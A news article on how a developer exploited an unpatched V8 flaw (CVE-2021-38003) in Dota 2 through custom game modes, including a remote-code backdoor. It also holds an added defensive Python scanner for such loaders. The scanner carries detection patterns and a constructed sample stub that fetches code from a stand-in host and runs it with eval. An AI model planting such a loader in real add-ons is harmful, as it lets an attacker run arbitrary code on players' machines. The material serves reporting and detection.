Valve waited 15 months to patch high-severity flaw. A hacker pounced

February 9, 2023

Researchers have identified four custom game modes built to exploit a high-severity vulnerability that remained unpatched in the popular Dota 2 video game for 15 months after a fix had become available upstream.

The vulnerability, tracked as CVE-2021-38003, is a memory-corruption bug in V8, the open source JavaScript engine from Google that Dota 2 embeds. Google patched it in October 2021, but Dota 2 developer Valve didn’t update the game to a patched V8 build until January 2023, after researchers privately alerted the company that the vulnerability was being exploited inside the game.

Unclear intentions

A hacker took advantage of the delay by publishing a custom game mode in March 2022 that exploited the vulnerability, researchers from security firm Avast said. That same month, the same hacker published three more game modes that very likely also exploited it. Along with updating V8 in January 2023, Valve removed all four modes.

Custom modes are extensions, or even completely new games, that run on top of Dota 2. They allow people with even basic programming experience to implement their ideas for a game and submit them to Valve. Valve then puts each submission through a verification process and, if it is approved, publishes it. That review is the only gate between a submitted mode and the players who install it.

The first of the four modes appears to be a proof-of-concept project for exploiting the vulnerability. It was titled “test addon plz ignore” (ID 1556548695) and carried a description urging people not to download or install it. Embedded inside the mode was exploit code for CVE-2021-38003. While some of the exploit was taken from proof-of-concept code published in the Chromium bug tracker, the mode’s developer wrote much of it from scratch. The mode also contained lots of commented-out code and a file titled “evil.lua”, further suggesting it was a test.

Avast researchers went on to find three more custom modes that the same developer had published through Valve. These modes, titled “Overdog no annoying heroes” (ID 2776998052), “Custom Hero Brawl” (ID 2780728794), and “Overthrow RTZ Edition X10 XP” (ID 2780559339), took a much more covert approach.

Avast researcher Jan Vojtěšek explained:

The malicious code in these three new game modes is much more subtle. There is no file named evil.lua nor any JavaScript exploit directly visible in the source code. Instead, there’s just a simple backdoor consisting of only about twenty lines of code. This backdoor can execute arbitrary JavaScript downloaded via HTTP, giving the attacker not only the ability to hide the exploit code, but also the ability to update it at their discretion without having to update the entire custom game mode (and going through the risky game mode verification process).

The server the three modes contacted was no longer responding by the time Avast researchers discovered them. But given that they were published by the same developer 10 days after the first mode, Avast says there’s a high likelihood the downloaded code also exploited CVE-2021-38003.

In an email, Vojtěšek described the operation flow of the backdoor this way:

  1. The victim enters a game, playing one of the malicious game modes.

  2. The game loads as expected, but in the background, a malicious JavaScript contacts the game mode’s server.

  3. The game mode’s server code reaches out to the backdoor’s C&C server, downloads a piece of JavaScript code (presumably, the exploit for CVE-2021-38003), and returns the downloaded code back to the victim.

  4. The victim dynamically executes the downloaded JavaScript. If this was the exploit for CVE-2021-38003, this would result in shellcode execution on the victim machine.
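The loader described above defeats a file-level review precisely because the payload is never in the submitted files; what is in them is a short "download, then execute" stub. The following scanner is an added example, not code from Avast or Valve, that flags that shape in a submitted mode's JavaScript and Lua files: a remote-fetch call and a dynamic-execution call active in the same file is rated high, dynamic execution of local data medium, plain network access low, and commented-out code (like the leftovers in the first mode) is ignored. The API names it looks for are assumptions about what such a stub would call (Panorama's `$.AsyncWebRequest`, Lua's `CreateHTTPRequestScriptVM`); the sample files are constructed for the demonstration.

```python
"""Heuristic scanner for "fetch-then-eval" loaders in custom game mode files.

Added example, not Avast's or Valve's code.  The API names below are
assumptions about what such a loader would call; eval / new Function /
loadstring are generic dynamic-execution sinks.
"""
import re
from dataclasses import dataclass, field

# Remote-fetch "sources" and dynamic-execution "sinks", per language.
REMOTE_SOURCES = {
    "js":  [r"\$\.AsyncWebRequest\s*\(", r"\bfetch\s*\(", r"\bXMLHttpRequest\b"],
    "lua": [r"\bCreateHTTPRequestScriptVM\s*\("],
}
DYNAMIC_SINKS = {
    "js":  [r"\beval\s*\(", r"\bnew\s+Function\s*\(", r"\bsetTimeout\s*\(\s*[\"']"],
    "lua": [r"\bloadstring\s*\(", r"\bload\s*\(", r"\bdofile\s*\("],
}
# Match string literals OR comments; only comments populate group 1, so the
# substitution keeps strings (e.g. "http://...") and drops commented-out code.
_COMMENT_RE = {
    "js":  re.compile(r'"(?:\\.|[^"\\])*"|\'(?:\\.|[^\'\\])*\'|(//[^\n]*|/\*.*?\*/)', re.S),
    "lua": re.compile(r'"(?:\\.|[^"\\])*"|\'(?:\\.|[^\'\\])*\'|(--\[\[.*?\]\]|--[^\n]*)', re.S),
}
_SEVERITY_RANK = {"high": 0, "medium": 1, "low": 2}


@dataclass
class Finding:
    path: str
    severity: str                      # high: fetch + dynamic exec in one file
    sources: list = field(default_factory=list)
    sinks: list = field(default_factory=list)


def language_of(path):
    """Map a file path to the scanner's language key, or None to skip it."""
    if path.endswith(".js"):
        return "js"
    if path.endswith(".lua"):
        return "lua"
    return None


def strip_comments(src, lang):
    """Remove comments but keep string literals intact."""
    return _COMMENT_RE[lang].sub(lambda m: "" if m.group(1) else m.group(0), src)


def scan_file(path, src):
    """Return a Finding for one file, or None if nothing suspicious is active."""
    lang = language_of(path)
    if lang is None:
        return None
    code = strip_comments(src, lang)
    sources = [pat for pat in REMOTE_SOURCES[lang] if re.search(pat, code)]
    sinks = [pat for pat in DYNAMIC_SINKS[lang] if re.search(pat, code)]
    if not sources and not sinks:
        return None
    if sources and sinks:
        severity = "high"       # the loader shape: download, then execute
    elif sinks:
        severity = "medium"     # dynamic execution of local data; review it
    else:
        severity = "low"        # network access alone; common but worth a look
    return Finding(path, severity, sources, sinks)


def scan_addon(files):
    """Scan a {path: source} mapping and return findings, worst first."""
    findings = [f for p, s in files.items() if (f := scan_file(p, s))]
    return sorted(findings, key=lambda f: _SEVERITY_RANK[f.severity])


# Constructed samples (not the real modes' code) exercising each outcome.
BACKDOOR_JS = """
function loadRemote() {
    $.AsyncWebRequest("http://example.invalid/payload", {
        type: "GET",
        success: function (data) { eval(data); }   // execute whatever came back
    });
}
loadRemote();
"""
BENIGN_JS = """
$.AsyncWebRequest("http://example.invalid/scores.json", {
    type: "GET",
    success: function (data) { $.Msg(JSON.parse(data)); }
});
"""
LUA_SINK_ONLY = """
local f = loadstring("return 1 + 1")  -- no network, but still dynamic code
"""
COMMENTED_JS = """
// eval(payload)  <- leftover, inactive: must not trigger a finding
$.Msg("hello");
"""
SAMPLE_ADDON = {
    "panorama/scripts/custom_game/scores.js": BENIGN_JS,
    "scripts/vscripts/addon_game_mode.lua": LUA_SINK_ONLY,
    "panorama/scripts/custom_game/loader.js": BACKDOOR_JS,
    "panorama/scripts/custom_game/leftover.js": COMMENTED_JS,
    "resource/addon_english.txt": "not scanned",
}

if __name__ == "__main__":
    for f in scan_addon(SAMPLE_ADDON):
        print(f"{f.severity:6} {f.path}  sources={len(f.sources)} sinks={len(f.sinks)}")
```

Run against the constructed add-on it reports the loader as high, the Lua `loadstring` as medium and the leaderboard fetch as low, and stays silent on the commented-out `eval`. The per-file pairing is deliberately coarse: a reviewer could still be evaded by splitting the fetch and the `eval` across files, so in practice a rule like this is a triage filter ahead of manual review, not a replacement for it, and any dynamic execution of network-sourced data in a submitted mode should be treated as a rejection reason regardless of what the downloaded code does today.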

Valve representatives didn’t respond to an email seeking comment for this story.

The researchers looked for additional Dota 2 game modes that exploited the vulnerability, but the trail went cold. That means it isn’t possible to determine precisely what the developer’s intentions were, but the Avast post gave two reasons to suspect the modes weren’t purely for benign research.

“First, the attacker did not report the vulnerability to Valve (which would generally be considered a nice thing to do),” Vojtěšek wrote. “Second, the attacker tried to hide the exploit in a stealthy backdoor. Regardless, it’s also possible that the attacker didn’t have purely malicious intentions either, since such an attacker could arguably abuse this vulnerability with a much larger impact.”
